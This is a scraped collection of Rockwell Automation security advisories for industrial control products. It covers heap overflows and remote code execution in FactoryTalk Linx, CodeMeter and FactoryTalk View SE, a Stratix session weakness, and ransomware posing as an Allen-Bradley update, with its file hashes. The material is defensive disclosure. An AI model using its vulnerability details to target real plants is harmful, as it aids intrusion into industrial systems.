  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS

Critical
PN1536 | PN1536 | FactoryTalk® Linx® Affected by Multiple Denial-of-Service and Heap Overflow Vulnerabilities
Published Date:
November 24, 2020
Last Updated:
November 24, 2020
CVE IDs:
CVE-2020-27251, CVE-2020-27255, CVE-2020-27253
Products:
FactoryTalk Linx Gateway
CVSS Scores:
8.6, 9.8, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - November 24, 2020. Initial Release.

Executive Summary

Rockwell Automation PSIRT received a report from Claroty, an industrial security product vendor and research company, regarding three vulnerabilities in FactoryTalk® Linx software. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, controlling of the execution flow or information disclosure. If the vulnerabilities are chained together, it may be possible to achieve remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to Claroty for discovering this vulnerability.

Affected Products

FactoryTalk Linx v6.11 and earlier.

Vulnerability Details

CVE-2020-27251: Remote Code Execution due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious port ranges, which could result in remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-27253: Denial-of-service due to a flaw in Ingress/Egress checks routine
A flaw exists in the Ingress/Egress checks routine of FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to specifically craft a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 8.6/10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2020-27255: Information Disclosure and ASLR bypass due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to  send malicious set attribute requests, which could result in leaking sensitive information. This information disclosure could lead to the bypass of Address Space Layout Randomization (ASLR).

CVSS v3.1 Base Score: 5.3 /10 [Medium]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N



Risk Mitigation & User Action


Customers using the affected FactoryTalk Linx are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details Recommended User Actions
CVE-2020-27253
CVE-2020-27251
CVE-2020-27255		 For FactoryTalk Linx v6.10 and v6.11
see Patch Answer ID BF25509

Additionally, the user could move to v6.20 which is available on the PCDC

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation® products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

PN1534 | PN1534 | Stratix 5700 HTTP Session Management Weakness
Published Date:
October 30, 2020
Last Updated:
October 30, 2020
Products:
Stratix 5700 Managed Switch
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - October 30, 2020. Initial Release.

Executive Summary

Rockwell Automation’s PSIRT received a report from Amazon regarding a weakness on the Stratix 5700 switch. This weakness is a result of HTTP session management not being a feature of classic Cisco IOS. This may result in unauthenticated access to the web interface if an attacker gains access to the authenticated user’s computer after the “Logout” button has been selected. Rockwell Automation’s PSIRT has collaborated with the Cisco PSIRT to inform customers of this weakness. While this button’s function may lead the user to believe the session is being cleared, the product specifications do not advertise HTTP session management as a function. Both PSIRTs, to be transparent, see the importance of sharing this issue along with potential mitigation options.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

Allen-Bradley Stratix 5700 Industrial Managed Ethernet Switches –
  • All Cisco IOS releases (with the exception of those which incorporate the new HTTP session management feature added through Cisco BugID CSCvo20762) lack HTTP and HTTPS session management capabilities.

Details

On the Stratix 5700 Industrial Managed Ethernet switch running Cisco IOS , because no session management is performed for HTTP or HTTP sessions, the only way to close and terminate an active HTTP or HTTPS management session is to close the web browser used for this session after the user is done. Closing the active tab or active window is not enough - the browser instance must be terminated.

If the browser instance has not been terminated, an actor with local access to the machine from which the session was established may be able to restart the management session without being prompted for any credentials, which would result in this actor having the same kind of access to the device as the user on the previous session.

Risk Mitigation & User Action

As of 26-OCT-2020, the following releases incorporate the new HTTP session management code: 15.9(3)M2, 15.9(3)M2a and 15.2(7)E3. Going forward, it is the intention of Cisco for this HTTP session management feature to be implemented in all future Cisco IOS classic releases.

If HTTP session management is desired while running a release which does not support the enhancement, Cisco IOS customers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Completing the following precautionary measure is recommended as a risk mitigation strategy against unauthenticated attackers.
  • Terminate the browser when finished – closing the tab or window is NOT enough

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar Whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

PN923 | PN923 | Claims of ransomware masquerading as an Allen-Bradley Update
Published Date:
October 02, 2020
Last Updated:
October 02, 2020
Products:
Compliance / Audit Trail / Security, 6181X Hazardous Non-Display, ProcessPak, Integration Manager, SOS, dsShopLib, RSLogix 500, Arena, Foundation Server, Shop Operations, Reporting (form based), RSView32 WebServer, Database, FactoryTalk ViewPoint, SPC, Admin Tools, RSView32 SPC, FactoryTalk VantagePoint, App Solutions Documentation, Business Objects, Migration, Studio 5000 View Designer, 650R Non-Display Computers, 750R Non-Display Computers, FactoryTalk View SE, Reporting, Interface Manager, Operator Certification, RSLogix 5, Live Transfer, 6181 Computers, 1450R Non-Display Computers, RSLogix Emulate 5000 / Studio 5000 Logix Emulate, LiveData, Agile, Installation, RSLogix Emulate 500, Knowledge Documentation, RSLogix Emulate 5, Build Utility, Shop Operation, Foundation Client, NCR/CAR/IQA, RSView32, FactoryTalk Activation, Purge, FactoryTalk Historian SE, WSIntegrate, SoftLogix5800, RSView32 Messenger, FactoryTalk Linx Gateway, Supplier Manager, RSView32 Active Display, Maintenance Releases, Connected Components Workbench, Documentation, Activities, ETL, Historical Transfer, ECO, 6180 Computers with Keypad, Production Management Client, RSLadder, RMA, Data, Thin Client, Logix Designer, Administration, 6155 Compact Computers, Production Execution Client, Installation, 6181X Hazardous Integrated Display, Dashboard, JD Edwards, ActiveX Control, FactoryTalk Metrics, TrendX, Universe Manager, FactoryTalk AssetCentre, Knowledge Installation, Sampling Plans, Configuration Tool, FactoryTalk Transaction Manager, Consumer Packaged Goods Suite, Reports (Out-of-box), PlantMetrics, API, FactoryTalk Batch, FactoryTalk EnergyMetrix, FactoryTalk View ME, SoftLogix5, Process Designer, Reports (Custom), Automotive Suite , Quality Assurance (6.x), ICAPA, RSLogix Architect / Studio 5000 Architect, Equipment Manager, PlantPAx, Complaint Handling, Pavilion, FactoryTalk Services Platform
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Claims of ransomware masquerading as an Allen-Bradley Update

Description

begin ignore



Version 2.0 - July 8th 2016

Rockwell Automation has learned about the existence of a malicious file called "Allenbradleyupload.zip" that is being distributed on the internet. This file is NOT an official update from Rockwell Automation, and we have been informed that this file contains a type of ransomware malware that, if successfully installed and launched, may compromise the victim’s computer. This advisory is intended to raise awareness to control system owners and operators of reports of the file’s existence as a result of reports Rockwell Automation received from the Electricity Information Sharing and Analysis Center ("E-ISAC").

Update 08-JUL-2016: Our investigation has confirmed the existence of the reported malware through VirusTotal.com. According to VirusTotal, it "is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware." According to information on VirusTotal.com, the file "Allenbradleyupload.zip" contains a single file called "Allenbradleyupload.exe", which may be malicious. File hashes and links to VirusTotal.com are in the table that follows below. These file hash values can be used with Application Whitelisting technologies to reduce the ability of this malware to execute on a system. According to VirusTotal, most of the antivirus/anti-malware vendors have updated their databases to detect this malware. However, we strongly recommend ensuring that your antivirus programs and virus definitions are up to date.

File Name Hash Type Hash Value
Allenbradleyupload.zip MD5 b552a95bd3eceb1770db622a08105f52
SHA-1 4dbba01786068426c032a7524e31668f2435d181
SHA-256 e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df
Allenbradleyupload.exe MD5 49067f7b3995e357c65e92d0c7d47c85
SHA-1 5f8c4246fc24d400dffef63f25a44b61932b13af
SHA-256 97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88

Rockwell Automation confirms that this malware is NOT an official product update and it is not connected with any Rockwell automation product, software update, or website.

Rockwell Automation decided to provide this advisory since the attackers have used the Rockwell Automation brand name on the file, possibly as a means to increase the likelihood of an ICS-knowledgeable user to download and execute the malware as part of their strategy. We are continuing to monitor this situation, and we will update this advisory as we learn more.

BACKGROUND

Ransomware is a class of malware that aims to extort money from the victim by restricting access to resources on the computer, and then demands a monetary ransom in order to remove the restrictions. The most common type is ransomware that will encrypt important files on an infected computer, rendering the files unusable without paying a ransom. Other types may restrict access to operating system functions or specific applications. Typically the user is required to pay the ransom in some form of untraceable currency, and must do so before the deadline expires and the decryption key is destroyed.

According to the September/October 2015 issue of the ICS-CERT Monitor, "Ransomware, such as Cryptolocker or TeslaCrypt, is currently one of the most prolific categories of malware growth, rising 165 percent in varieties seen between the fourth quarter of 2014 and the first quarter of 2015".

CUSTOMER RISK MITIGATIONS

Where feasible, precautions and risk mitigation strategies to this type of attack, like those listed below are recommended. When possible, multiple strategies should be employed simultaneously.

  • Obtain product software and firmware from Rockwell Automation’s official download portal, available at http://www.rockwellautomation.com/global/support/drivers-software-downloads.page.
  • Follow industry best-practices to harden your PCs and Servers, including anti-virus/anti-malware and application whitelisting solutions. These recommendations are published in KB546987.
    • Consult VirusTotal.com’s analysis of the malware (using the links above), to determine if your deployed antivirus solution is able to detect this malware. (UPDATED 08-JUL-2016)
  • Analyze outbound network traffic against the known indicators of compromise (IoC), available from the US-CERT portal, to identify and assess the risk of any unusual network activity.
  • Develop, and then deploy, backup and disaster recovery policies and procedures. Test backups on a regular schedule.
  • Implement a change management system to archive network, controller and computer assets (e.g., clients, servers and applications).
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack, which can also serve as a vehicle for malware infection.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to http://www.rockwellautomation.com/rockwellautomation/products-technologies/network-technology/architectures.page? for comprehensive information about implementing validated architectures designed to deliver these measures.

We also recommend concerned customers continue to monitor this advisory, Rockwell Automation’s Security Advisory Index at https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html, and the company public security webpage at http://www.rockwellautomation.com/security for new and relevant information relating to this matter.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

end ignore

KCS Status

Released

Critical
PN1530 | PN1530 | FactoryTalk Activation Manager affected by CodeMeter Vulnerabilities
Published Date:
September 18, 2020
Last Updated:
September 18, 2020
CVE IDs:
CVE-2020-14517, CVE-2020-16233, CVE-2019-14519, CVE-2020-14519, CVE-2020-14515, CVE-2020-14509, CVE-2020-14513
Products:
FactoryTalk Activation
CVSS Scores:
7.4, 8.1, 9.4, 7.5, 10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
4.0
Revision History
Version 4.0 -- September 18, 2020. Update to reflect current mitigations. Updated links.
Version 3.0 -- September 16, 2020. Update to reflect current remediations and information from Wibu. See update below.
Version 2.1 -- September 15, 2020. Update to adjust language.
Version 2.0 -- September 14, 2020. Update regarding affected CodeMeter versions and vulnerability information.
Version 1.0 – September 08, 2020

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding vulnerabilities in Wibu-Systems’ CodeMeter. These vulnerabilities, if successfully exploited, may result in remote code execution, privilege escalation, or denial of service conditions to the products dependent on CodeMeter. CodeMeter is distributed as part of the installation for FactoryTalk Activation Manager. FactoryTalk Activation Manager enables customers to manage licensed content and activate Rockwell Automation software products.

Claroty has released documentation that outlines the vulnerabilities in detail. This information may make it easier for an adversary to compromise the host running Wibu CodeMeter. Customers using the affected versions of FactoryTalk Activation Manager and/or CodeMeter should implement the mitigations detailed below as soon as possible.

Affected Products

FactoryTalk Activation (FTA) Manager v4.05.00 and earlier running Wibu-Systems CodeMeter v7.10 or earlier.

The following products require FactoryTalk Activation Manager to store and keep track of Rockwell Automation software products and activation files. Customers who use the products from the following list in their install base contain FactoryTalk Activation Manager.
  • Arena® software
  • Emonitor® software
  • FactoryTalk® AssetCentre software
  • FactoryTalk® Batch software
  • FactoryTalk® EnergyMetrix software
  • FactoryTalk® eProcedure® software
  • FactoryTalk® Gateway software
  • FactoryTalk® Historian Site Edition (SE) software
  • FactoryTalk® Historian Classic software
  • FactoryTalk® Information Server software
  • FactoryTalk® Metrics software
  • FactoryTalk® Transaction Manager software
  • FactoryTalk® VantagePoint® software
  • FactoryTalk® View Machine Edition (ME) software
  • FactoryTalk® View Site Edition (SE) software
  • FactoryTalk® ViewPoint software
  • RSFieldbus™ software
  • RSLinx® Classic software
  • RSLogix 500® software
  • RSLogix 5000® software
  • RSLogix™ 5 software
  • RSLogix Emulate 5000 software
  • RSNetWorx software
  • RSView®32 software
  • SoftLogix5800 software
  • Studio 5000 Architect® software
  • Studio 5000 Logix Designer® software
  • Studio 5000 View Designer® software
  • Studio 5000® Logix Emulate software

Vulnerability Details

CVE-2020-14509: Arbitrary Command Execution Due to Buffer Access with Incorrect Length Value of CodeMeter
The packet parsing mechanism of CodeMeter does not verify its length field values causing it to access memory outside the bounds of the buffer. This may allow an attacker to execute arbitrary commands by sending a specifically crafted packet. This out of bounds memory access could also lead to relevant memory corruption causing denial-of-service conditions by crashing the CodeMeter server

CVSS v3.1 Base Score: 10.0/10 [CRITICAL]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-14517: Arbitrary Command Execution Due to the Inadequate Encryption Strength of CodeMeter
A vulnerability exists in the encryption scheme of CodeMeter, which allows a bypass of the protection mechanism, enabling the server to accept external connections without authentication. This may allow an attacker to remotely communicate with the CodeMeter API, access and modify application data.

CVSS v3.1 Base Score: 9.4/10 [CRITICAL]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H)

CVE-2019-14519: Denial-of-Service Conditions Due to the Origin Validation Errors of CodeMeter
The API of the WebSocket internals of CodeMeter does not provide authentication on its WebSocket services. This may allow an attacker to cause denial-of-service conditions by sending a specifically crafted JavaScript payload allowing alteration or creation of license files.

CVSS v3.1 Base Score: 8.1/10 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

CVE-2020-16233: Denial-of-Service Conditions Due to the Improper Resource Release of CodeMeter
A vulnerability exists in the internal program resource management of CodeMetermanagement, which allows the disclosure of heap memory. This may allow an attacker to cause denial-of-service conditions by triggering an intentional resource leak.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2020-14513: Denial-of-Service Conditions Due to Improper Input Validation of CodeMeter
A vulnerability exists in the input validation method of CodeMeter that can affect its program control flow or data flow. This may allow an attacker to alter the control flow and cause denial-of-service conditions to CodeMeter and any product dependencies by using a specifically crafted license file.

CVSS v3.1 Base Score: 7.5 [HIGH]
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-14515: Denial-of-Service Condition or Data Modification due to Improper Verification of a Cryptographic Signature in CodeMeter
A vulnerability exists in the license-file signature checking mechanism, which may allow an attacker to build arbitrary license files including forging a valid license file as if it were a valid license file of an existing vendor. This may allow an attacker to modify data or could cause a denial-of-service condition to CodeMeter.

CVSS v3.1 Base Score: 7.4/10 [HIGH]
CVSS v3.1 Vector: AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H

Risk Mitigation & User Action

UPDATE (4.0)
Customers using the affected versions of FactoryTalk Activation Manager are encouraged to update to v4.05.01. This version of FactoryTalk Activation Manager contains CodeMeter 7.10a, which addresses the vulnerabilities. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Currently Installed Suggested Actions
CVE-2020-14517
CVE-2020-16233
CVE-2020-14513
CVE-2020-14509
CVE-2020-14519
CVE-2020-14515

 FactoryTalk Activation Manager v4.05.00 and earlier Update to version 4.05.01 of FactoryTalk Activation Manager. Select the FactoryTalk Activation Manager download from our website.

This information can also be found in Compatibility & Downloads > Configured Views > Standard Views > Software Latest Versions > FactoryTalk Activation.

UPDATE (3.0)
Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. As of September 16, 2020, CodeMeter 7.10a is compatible with FactoryTalk Activation Manager via the Rockwell Automation Product Compatibility and Download Center (PCDC). This version of CodeMeter remediates all of the vulnerabilities noted below. Customers can update CodeMeter directly from Wibu, which is compatible with all supported versions of FTA. A bundled version of CodeMeter 7.10a and FactoryTalk Activation Manager will also release in the coming days.

Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability Currently Installed Suggested Actions
CVE-2020-14517
CVE-2020-16233
CVE-2020-14513
CVE-2020-14509
CVE-2020-14519
CVE-2020-14515

 FactoryTalk Activation Manager v4.05.00 and earlier Update to version 7.10a of CodeMeter found on the Rockwell Automation PCDC, which is compatible with all supported versions of FTA.

This information can also be found in Compatibility & Downloads > Configured Views > Standard Views > Software Latest Versions > FactoryTalk Activation.

Previous Information Contained in Versions 1.0-2.1
Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk for CVE-2019-14519, and CVE-2020-14515. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

For CVE-2020-14517, CVE-2020-16233, and CVE-2020-14513, FTA v4.05 or later mitigates these vulnerabilities unless CodeMeter is running as a server. Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.
Vulnerability Currently Installed Suggested Actions
CVE-2020-14519
CVE-2020-14515
 FactoryTalk Activation Manager v4.04.00 and earlier Update to FTA v4.05 or later and employ the general security guidelines.

For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center Standard Views > Software Latest Versions > FactoryTalk Activation
CVE-2020-14517
CVE-2020-16233
CVE-2020-14513
CVE-2020-14509		 FactoryTalk Activation Manager v4.04.00 and earlier Update to FTA v4.05 or later and employ the general security guidelines.

The default configuration of FTA v4.05 limits the vulnerable port, which mitigates these vulnerabilities. However, if CodeMeter is running a server, which can be turned on via FTA, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that any traffic from unauthorized sources are blocked.
  • Consult the product documentation for specific features, such as a hardware key switch setting, to which may be used to block unauthorized changes, etc.
  • Utilize the new REST API instead of the internal WebSockets API
  • Disable the WebSockets API
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN71
For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS

Critical
PN1510 | PN1510 | FactoryTalk View SE Contains Multiple Vulnerabilities Found During Pwn2Own Competition
Published Date:
August 20, 2020
Last Updated:
August 20, 2020
CVE IDs:
CVE-2020-12027, CVE-2020-12028, CVE-2020-12029, CVE-2020-12031
Products:
FactoryTalk View SE
CVSS Scores:
7.5, 9.0, 7.3, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.2
Revision History
Version 2.2 - August 20, 2020 Links to additional detections
Version 2.1 - August 18, 2020 Links to additional detections
Version 2.0 - July 23, 2020. Updated guidance given public scripts.
Version 1.0 - June 18, 2020. Initial Release.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of flaws in the way FactoryTalk View SE handles certain sensitive information, authentication mechanisms, and bounds checking, which could lead to Remote Code Execution (RCE).

Special thanks to the following researchers who submitted these vulnerabilities through the Pwn2Own competition: The Incite Team (Steven Seeley and Chris Anastasio), Claroty Research (Sharon Brizinov and Amir Preminger), Synacktiv (Lucas Georges), Tobias Scharnowski, Niklas Brietfeld, Ali Abbasi, Pedro Ribeiro,  Radek Domanski, and Fabius Artrel.

As of July 23, 2020, the researchers, along with ZDI, have released documentation and a script that makes it possible for an unskilled adversary to compromise the host running FactoryTalk View SE. Customers using the affected versions of FactoryTalk View SE should apply the patch and implement the mitigations detailed below as soon as possible.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk View SE all versions

Vulnerability Details

CVE-2020-12029: Code execution due to improper limitation of a pathname to a restricted directory
FactoryTalk View SE does not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE).

CVSS v3.1 Base Score: 9.0 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10284

CVE-2020-12031: Code execution due to improper bounds checking
FactoryTalk View SE fails to bounds-check monitor configurations. After bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution. This attack depends on user interaction to be successful.

CVSS v3.1 Base Score: 7.5 (HIGH)
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10270

CVE-2020-12028: Unauthenticated file permissions for remote endpoints
FactoryTalk View SE provides the capability to interact with remote endpoints, which are accessible by a series of handlers. A remote, authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions. This attack depends on user interaction to be successful.

CVSS v3.1 Base Score: 7.3 (HIGH)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10283


CVE-2020-12027: Information disclosure affecting remote endpoints
FactoryTalk View SE discloses the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts.

CVSS v3.1 Base Score: 5.3 (MEDIUM)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
ZDI Tracking: ZDI-CAN-10281, ZDI-CAN-10282, ZDI-CAN-10291

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk View SE are encouraged to apply the patch or deploy recommended built in security features that addresses the associated risk. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Information Recommended User Actions
CVE-2020-12029 Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. QA49264 - Patch Roll-up for CPR9 SRx
Apply patch BF25481
CVE-2020-12031 Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. QA49264 - Patch Roll-up for CPR9 SRx
Apply patch found in BF25482
CVE-2020-12028
CVE-2020-12027		 This vulnerability is remediated by enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in QA46277 and QA59546 to set up IPSec and/or HTTPS, respectively.

Note: The Cisco Talos team developed Snort rules to detect these vulnerabilities (sid:54670-54675).

Additionally, Claroty has provided the following detections:
Rule Name: FactoryTalk View SE Directory Traversal CVE-2020-12027
Detection Identifier: 1000000055

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted filed.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

